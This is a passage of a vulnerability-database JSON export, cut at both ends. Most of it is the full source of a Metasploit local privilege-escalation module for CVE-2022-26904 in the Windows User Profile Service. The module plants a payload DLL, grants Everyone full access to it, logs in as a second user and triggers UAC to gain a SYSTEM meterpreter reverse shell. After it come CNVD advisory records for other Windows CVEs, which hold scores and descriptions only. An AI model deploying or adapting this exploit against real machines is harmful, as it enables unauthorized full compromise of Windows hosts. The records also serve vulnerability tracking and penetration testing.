"CVE-2022-26904"], "modified": "2022-04-12T00:00:00", "id": "1337DAY-ID-37625", "href": "https://0day.today/exploit/description/37625", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Exploit::FileDropper\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Exploit::EXE # Needed for generate_payload_dll\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'User Profile Arbitrary Junction Creation Local Privilege Elevation',\n 'Description' => %q{\n The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability\n in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of\n the junctions it tries to link together.\n\n Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a\n UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user.\n\n Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as\n CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for\n CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it\n as CVE-2022-26904.\n\n It is important to note that the credentials supplied for the second user to log in as in this exploit must be\n those of a normal non-admin user and these credentials must also corralate with a user who has already logged in\n at least once before. Additionally the current user running the exploit must have UAC set to the highest level,\n aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. Note however that\n \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances\n where this setting has been changed either manually or as part of the installation process.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'KLINIX5', # Aka Abdelhamid Naceri. Original PoC w Patch Bypass\n 'Grant Willcox' # Metasploit module + Tweaks to PoC\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' => [\n [ 'Windows 11', { 'Arch' => ARCH_X64 } ]\n ],\n 'References' => [\n ['CVE', '2022-26904'],\n ['URL', 'https://github.com/rmusser01/SuperProfile'], # Original link was at https://github.com/klinix5/SuperProfile/ but was taken down. This is a backup.\n ['URL', 'https://web.archive.org/web/20220222105232/https://halove23.blogspot.com/2022/02/blog-post.html'], # Original blog post\n ['URL', 'https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx'] # Discussion of previous iterations of this bug providing insight into patched functionality.\n ],\n 'DisclosureDate' => '2022-03-17', # Date MSRC supplied CVE number, bug is not patched atm.\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE, ],\n 'Reliability' => [ REPEATABLE_SESSION ], # Will need to double check this as this may require some updates to the code to get it to the point where it can be used repetitively.\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS, AUDIO_EFFECTS ]\n },\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 300\n },\n 'AKA' => [ 'SuperProfile' ]\n }\n )\n )\n\n register_options([\n OptString.new('LOGINUSER', [true, 'Username of the secondary normal privileged user to log in as. Cannot be the same as the current user!']),\n OptString.new('LOGINDOMAIN', [true, 'Domain that the LOGINUSER belongs to. Ensures we log into the right domain.', '.']),\n OptString.new('LOGINPASSWORD', [true, 'Password for the secondary normal privileged user to log in as'])\n ])\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n # see https://docs.microsoft.com/en-us/windows/release-information/\n unless sysinfo_value =~ /(7|8|8\\.1|10|11|2008|2012|2016|2019|2022|1803|1903|1909|2004)/\n return CheckCode::Safe('Target is not running a vulnerable version of Windows!')\n end\n\n print_status('Checking if PromptOnSecureDesktop mitigation applied...')\n reg_key = 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'\n reg_val = 'PromptOnSecureDesktop'\n begin\n root_key, base_key = @session.sys.registry.splitkey(reg_key)\n value = @session.sys.registry.query_value_direct(root_key, base_key, reg_val)\n rescue Rex::Post::Meterpreter::RequestError => e\n return CheckCode::Unknown(\"Was not able to retrieve the PromptOnSecureDesktop value. Error was #{e}\")\n end\n\n if value.data == 0\n return CheckCode::Safe('PromptOnSecureDesktop is set to 0, mitigation applied!')\n elsif value.data == 1\n print_good('PromptOnSecureDesktop is set to 1, should be safe to proceed!')\n else\n return CheckCode::Unknown(\"PromptOnSecureDesktop was not set to a known value, are you sure the target system isn't corrupted?\")\n end\n\n _major, _minor, build, revision, _branch = file_version('C:\\\\Windows\\\\System32\\\\ntdll.dll')\n major_minor_version = sysinfo_value.match(/\\((\\d{1,2}\\.\\d)/)\n if major_minor_version.nil?\n return CheckCode::Unknown(\"Could not retrieve the major n minor version of the target's build number!\")\n end\n\n major_minor_version = major_minor_version[1]\n build_num = \"#{major_minor_version}.#{build}.#{revision}\"\n\n build_num_gemversion = Rex::Version.new(build_num)\n\n # Build numbers taken from https://www.gaijin.at/en/infos/windows-version-numbers and from\n # https://en.wikipedia.org/wiki/Windows_11_version_history and https://en.wikipedia.org/wiki/Windows_10_version_history\n if (build_num_gemversion >= Rex::Version.new('10.0.22000.0')) # Windows 11\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) # Windows Server 2022\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) # Windows 10 21H2\n return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) # Windows 10 21H1\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) # Windows 10 20H2 / Windows Server, Version 20H2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) # Windows 10 v2004 / Windows Server v2004\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v2004 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) # Windows 10 v1909 / Windows Server v1909\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) # Windows 10 v1903\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) # Windows 10 v1809 / Windows Server 2019 v1809\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) # Windows 10 v1803\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) # Windows 10 v1709\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) # Windows 10 v1703\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) # Windows 10 v1607 / Windows Server 2016 v1607\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) # Windows 10 v1511\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) # Windows 10 v1507\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) # Windows 8.1/Windows Server 2012 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) # Windows 8/Windows Server 2012\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) # Windows 7 SP1/Windows Server 2008 R2 SP1\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7600.0')) # Windows 7/Windows Server 2008 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.0.6002.0')) # Windows Server 2008 SP2\n target_not_presently_supported\n return CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def target_not_presently_supported\n print_warning('This target is not presently supported by this exploit. Support may be added in the future!')\n print_warning('Attempts to exploit this target with this module WILL NOT WORK!')\n end\n\n def check_target_is_running_supported_windows_version\n if !sysinfo['OS'].include?('Windows')\n fail_with(Failure::NotVulnerable, 'Target is not running Windows!')\n elsif !sysinfo['OS'].include?('Windows 10') && !sysinfo['OS'].include?('Windows 11') && !sysinfo['OS'].include?('Windows Server 2022')\n fail_with(Failure::NoTarget, 'Target is running Windows, its not a version this module supports! Bailing...')\n end\n end\n\n def exploit\n # Step 1: Check target environment is correct.\n print_status('Step #1: Checking target environment...')\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n check_target_is_running_supported_windows_version\n\n # Step 2: Generate the malicious DLL and upload it to a temp location.\n payload_dll = generate_payload_dll\n print_status(\"Payload DLL is #{payload_dll.length} bytes long\")\n temp_directory = session.sys.config.getenv('%TEMP%')\n malicious_dll_location = \"#{temp_directory}\\\\#{Rex::Text.rand_text_alpha(6..13)}.dll\"\n print_status(\"Writing malicious DLL to #{malicious_dll_location}\")\n write_file(malicious_dll_location, payload_dll)\n\n print_status('Marking DLL as full access for Everyone so that there are no access issues as the secondary user...')\n cmd_exec(\"icacls #{malicious_dll_location} /grant Everyone:(F)\")\n register_file_for_cleanup(malicious_dll_location)\n\n # Register the directories we create for cleanup\n register_dir_for_cleanup('C:\\\\Windows\\\\System32\\\\Narrator.exe.Local')\n register_dir_for_cleanup('C:\\\\Users\\\\TEMP')\n\n # Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy.\n print_status('Step #3: Loading the exploit DLL to run the main exploit...')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-26904', 'CVE-2022-26904.dll')\n library_path = ::File.expand_path(library_path)\n\n dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINDOMAIN'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s\n\n @session_obtained_bool = false\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation, and the credentials for the second user.\n execute_dll(library_path, dll_info_parameter)\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n print_warning(\"Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion:\")\n print_warning('taskkill /IM \"consent.exe\" /F || taskkill /IM \"narrator.exe\" /F || taskkill /IM \"narratorquickstart.exe\" /F || taskkill /IM \"msiexec.exe\" || rmdir /q /s C:\\Users\\TEMP || rmdir /q /s C:\\Windows\\System32\\Narrator.exe.local')\n print_warning('You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!')\n\n print_status('Sleeping for 60 seconds before trying to spawn UserAccountControlSettings.exe as a backup.')\n print_status('If you get a shell back before this, feel free to CTRL+C once the shell has successfully returned.')\n sleep(60)\n if (@session_obtained_bool == false)\n # Execute a command that requires elevation to cause the UAC prompt to appear. For some reason the DLL code itself\n # triggering the UAC prompt won't work at times so this is the best way of solving this issue for cases where this happens.\n begin\n cmd_exec('UserAccountControlSettings.exe')\n rescue Rex::TimeoutError\n print_warning('Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!')\n end\n end\n end\n\n def on_new_session(new_session)\n @session_obtained_bool = true\n old_session = @session\n @session = new_session\n if new_session.type == 'meterpreter'\n consent_pids = pidof('consent.exe')\n for id in consent_pids\n @session.sys.process.kill(id)\n end\n sleep(5) # Needed as otherwise later folder deletion calls sometimes fail, and additional Narrator.exe processes\n # can sometimes spawn a few seconds after we close consent.exe so we want to grab all of them at once.\n narrator_pids = pidof('Narrator.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('NarratorQuickStart.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('msiexec.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n else\n # If it is another session type such as shell or PowerShell we will need to execute the command\n # normally using cmd_exec() to cleanup, as it doesn't seem we have a built in option to kill processes\n # by name or PIDs as library functions for these session types.\n cmd_exec('taskkill /IM \"consent.exe\" /F')\n sleep(5)\n cmd_exec('taskkill /IM \"narrator.exe\" /F')\n cmd_exec('taskkill /IM \"narratorquickstart.exe\" /F')\n cmd_exec('taskkill /IM \"msiexec.exe\" /F')\n end\n\n rm_rf('C:\\\\Windows\\\\System32\\\\Narrator.exe.local')\n for _i in range(1..3)\n rm_rf('C:\\\\Users\\\\TEMP') # Try deleting this 3 times just to be sure.\n end\n @session = old_session\n super\n end\nend\n", "sourceHref": "https://0day.today/exploit/37625", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "cnvd": [{"lastseen": "2022-11-07T17:42:26", "description": "Microsoft Windows is a desktop operating system from Microsoft Corporation (USA), and a remote code execution vulnerability exists in Microsoft Windows Server Service. The vulnerability is caused by a flaw in the server service component. An attacker could exploit the vulnerability to execute arbitrary code on the system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-15T00:00:00", "type": "cnvd", "title": "Microsoft Windows Server Service Remote Code Execution Vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24541"], "modified": "2022-11-07T00:00:00", "id": "CNVD-2022-74597", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-74597", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-26T23:18:37", "description": "Microsoft Windows Kernel is the kernel of the Windows operating system from Microsoft Corporation (USA).Microsoft Windows Kernel is vulnerable to information disclosure. The vulnerability stems from errors in the configuration of the network system or product during operation. An attacker could use this vulnerability to gain access to sensitive information.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-15T00:00:00", "type": "cnvd", "title": "Microsoft Windows Kernel Information Disclosure Vulnerability (CNVD-2022-65612)", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24483"], "modified": "2022-09-26T00:00:00", "id": "CNVD-2022-65612", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-65612", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2022-09-11T03:54:32", "description": "Microsoft Remote Procedure Call Runtime is a technology used to create distributed client/server programs from Microsoft Corporation (USA). The vulnerability can be exploited to execute arbitrary code on the system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-15T00:00:00", "type": "cnvd", "title": "Microsoft Remote Procedure Call Runtime Remote Code Execution Vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24528"], "modified": "2022-09-10T00:00:00", "id": "CNVD-2022-62520", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-62520", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-07T17:42:40", "description": "Microsoft Windows Network File System is a file sharing solution from Microsoft that allows you to transfer files between computers running Windows Server and UNIX operating systems using the NFS protocol. Network File System is vulnerable to a remote code execution vulnerability caused by a flaw in the Network File System component. An attacker could exploit this vulnerability to execute arbitrary code on the system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T00:00:00", "type": "cnvd", "title": "Microsoft Windows Network File System Remote Code Execution Vulnerability (CNVD-2022-74601)", "bulletinFamily": "cnvd", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24497"], "modified": "2022-11-07T00:00:00", "id": "CNVD-2022-74601", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-74601", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-09-10T21:56:04", "description": "Microsoft Windows Common Log File System Driver is a Microsoft Corporation Common Log File System (CLFS) API that provides a high-performance, common log file subsystem that can be used by dedicated client applications and shared by multiple clients to optimize log access. An elevation-of-privilege vulnerability exists in the Microsoft Windows Common Log File System Driver. An attacker could exploit this vulnerability to execute arbitrary code with elevated privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T00:00:00", "type": "cnvd", "title": "Microsoft Windows Common Log File System Driver\u6743\u9650\u63d0\u5347\u6f0f\u6d1e", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24521"], "modified": "2022-09-10T00:00:00", "id": "CNVD-2022-62521", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-62521", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-03T05:22:02", "description": "Microsoft Windows is an operating system for personal devices from Microsoft Corporation (USA).A remote code execution vulnerability exists in Microsoft Windows DNS Server, which can be exploited by attackers to execute arbitrary code on the system.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T00:00:00", "type": "cnvd", "title": "Microsoft Windows DNS Server Remote Code Execution Vulnerability (CNVD-2022-84116)", "bulletinFamily": "cnvd", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26812"], "modified": "2022-12-02T00:00:00", "id": "CNVD-2022-84116", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-84116", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-10-27T11:20:29", "description": "Microsoft Windows is an operating system for personal devices, and Microsoft Windows Server is a server operating system, of which Windows DNS Server is a DNS (Domain Name System) server. code execution vulnerability, which can be exploited by attackers to execute arbitrary code on the system.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T00:00:00", "type": "cnvd", "title": "Microsoft Windows DNS Server Remote Code Execution Vulnerability (CNVD-2022-71743)", "bulletinFamily": "cnvd", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26814"], "modified": "2022-10-27T00:00:00", "id": "CNVD-2022-71743", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-71743", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-10-28T11:26:54", "description": "Microsoft Windows is an operating system for personal devices, Microsoft Windows Server is a server operating system, and Windows DNS Server is one of the DNS (Domain Name System) servers. code execution vulnerability in Microsoft Windows DNS Server. The vulnerability stems from the failure of a network system or product to properly filter special elements of code segments during external input data construction. An attacker could use this vulnerability to execute arbitrary code on the system.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T00:00:00", "type": "cnvd", "title": "Microsoft Windows DNS Server Remote Code Execution Vulnerability (CNVD-2022-71975)", "bulletinFamily": "cnvd", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26829"], "modified": "2022-10-28T00:00:00", "id": "CNVD-2022-71975", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-71975", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2023-05-27T15:32:44", "description": "# CVE-2022-24483\nPOC For C...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-12T18:04:29", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24483"], "modified": "2023-01-10T14:31:15", "id": "35A3A9CB-BAAD-5901-9147-926EDBCDC9D3", "href": "", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:19:22", "description": "CVE-2022-24491\n=================================\n\nA Zeek detecto...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": 